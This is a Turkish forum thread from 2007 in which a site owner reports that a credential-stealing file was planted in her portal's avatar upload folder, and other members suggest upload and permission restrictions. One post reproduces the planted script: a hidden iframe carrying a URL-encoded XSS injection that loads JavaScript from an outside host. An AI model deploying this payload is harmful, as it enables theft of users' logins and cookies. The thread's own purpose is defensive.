Gönderen Konu: MK Portalima birisi yahoo sifre calici yerlestirmis (Okunma sayısı 2204 defa)

Dilek · « : Mart 21, 2007, 11:10:29 ÖÖ »

Selamlar, dun email adresimin sifresinin calindigini fark ettim. Sonra baska mail hesabima calinan hesabimdan mail aldim ve su linke tiklamam soylendi http://www.nuryagmuru.com/forum/avatars/index.htm

oraya belli ki hacklik bir sey koymuslar. lutfen yardimci olurmusunuz.

Dilek · « **Yanıtla #1 :** Mart 21, 2007, 11:17:11 ÖÖ »

Simdi bir seyler tahmin edebiliyorum. sanirim bu kisi avatar yerinden index dosyasini yuklemis. peki avatar yuklemeyi nasil off yapacagim?

Dilek · « **Yanıtla #2 :** Mart 21, 2007, 11:19:24 ÖÖ »

o dosyada su yaziyor

<script>document.write('<iframe name="I1" src="http://pg.photos.yahoo.com/ph/page?.file=calendar_splash.html&.dir=%22%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%6F%70%72%61%71%2E%69%6E%66%6F%2F%70%6F%72%74%61%6C%2F%63%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>')

window.status=" "

</script>

Dilek · « **Yanıtla #3 :** Mart 21, 2007, 11:28:04 ÖÖ »

ok adminden dosya eki ve avatar dan gerekli ayarlamalari yaptim.
Sizde yapin kardeslerim, bence yuklemeye txt ve doc lara izin vermeyin. rar, gif, jpg yeter gibi geliyor bana. gerci ben simdilik hepsini off yaptim.

AdmiN · « **Yanıtla #4 :** Mart 21, 2007, 12:49:51 ÖS »

1- Siteye yeni üye olan üyelerin yapabilecekleri işlemleri kısıtlamak gerekiyor.
-avatar yükleme
-özel başlığını değiştirme (buraya kod eklenip siteye zarar verilebilir)
- Kısıtlı özel mesaj sayısı vs.

2- Yükleme ayarlarındaki yüklenebilecek dosya türlerini kontrol etmek gerekiyor.Burada asp, php gibi dosya uzantılarına izin vermemek gerekiyor.
3- Üye gruplarının yetkilerini iyi ayarlamak gerekiyor.Mesaj sayısı arttıkça kullanıcının yapabilecekleri de artabilir gibi.

Ayrıca yukardaki kod yahoo mail çalma koduna değil de, Yahoo dan resim çağırmaya benziyor.Tabi kötü amaçlı biri o resmin içine xss kodu ekleyip cokie çalmaya çalışabilir.

casama · « **Yanıtla #5 :** Nisan 28, 2007, 04:26:58 ÖÖ »

aslinda bence bosa kafa yoruyorsun php nin zaten en buyuk dusmani hack nedense hackerlar php sitelerine saldirmayi tercih ediyorlar nedendir dersin

ultraceran · « **Yanıtla #6 :** Mayıs 07, 2007, 21:55:21 ÖS »

üyeleri istediğimiz yetkiye ve istediğimiz rütbe ekleme ve rütbeye göre yetkileri hangi asp codundan ayarlamamız lazım Üye Seviyesini istediğim gibi yetkileri değiştirip istediğim şekilde rütbe vermeyi nasıl ayarlamam gerekiyor acaba

Konu / Başlatan	Yanıt	Son İleti
Yahoo Messenger da artık online Başlatan GozyaSi Genel Haberler	0 Yanıt 1072 Gösterim	Mayıs 06, 2007, 22:02:44 ÖS Gönderen: GozyaSi
Yahoo Messenger'da çevik solucan Başlatan GozyaSi Genel Haberler	1 Yanıt 1186 Gösterim	Mayıs 25, 2007, 13:35:24 ÖS Gönderen: gencler
Yahoo kendini yeniliyor Başlatan GozyaSi Genel Haberler	1 Yanıt 1110 Gösterim	Ekim 07, 2007, 11:26:05 ÖÖ Gönderen: burajan
ASP 'de Sifre korumali giris Başlatan Yasin_0023 Web Tasarım Kaynakları	0 Yanıt 1230 Gösterim	Ağustos 24, 2008, 08:33:56 ÖÖ Gönderen: Yasin_0023
Php'den Anlayan Birisi Yardım Etsin Başlatan by_fenerli Php	1 Yanıt 675 Gösterim	Eylül 16, 2010, 15:38:15 ÖS Gönderen: PCodemaster

Gönderen Konu: MK Portalima birisi yahoo sifre calici yerlestirmis (Okunma sayısı 2204 defa)

Dilek

MK Portalima birisi yahoo sifre calici yerlestirmis

Dilek

-MK Portalima birisi yahoo sifre calici yerlestirmis

Dilek

-MK Portalima birisi yahoo sifre calici yerlestirmis

Dilek

-MK Portalima birisi yahoo sifre calici yerlestirmis

AdmiN

-MK Portalima birisi yahoo sifre calici yerlestirmis

casama

-MK Portalima birisi yahoo sifre calici yerlestirmis

ultraceran

-MK Portalima birisi yahoo sifre calici yerlestirmis

Benzer Konular